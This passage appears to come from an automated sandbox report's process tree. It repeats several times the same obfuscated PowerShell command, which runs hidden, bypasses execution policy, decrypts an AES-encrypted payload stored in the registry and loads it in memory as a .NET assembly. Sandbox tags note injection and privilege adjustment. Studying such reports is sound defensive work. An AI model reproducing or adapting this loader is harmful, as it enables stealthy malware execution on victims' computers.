'').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5336
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:3352
                                                                                                                          • C:\Windows\$sxr-powershell.exe
                                                                                                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2100).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Hide Artifacts: Hidden Window
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5276
                                                                                                                          • C:\Windows\system32\wermgr.exe
                                                                                                                            "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2100" "2988" "2920" "2992" "0" "0" "2996" "0" "0" "0" "0" "0"
                                                                                                                            7⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:1968
                                                                                                                        • C:\Windows\$sxr-powershell.exe
                                                                                                                          "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1200).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] 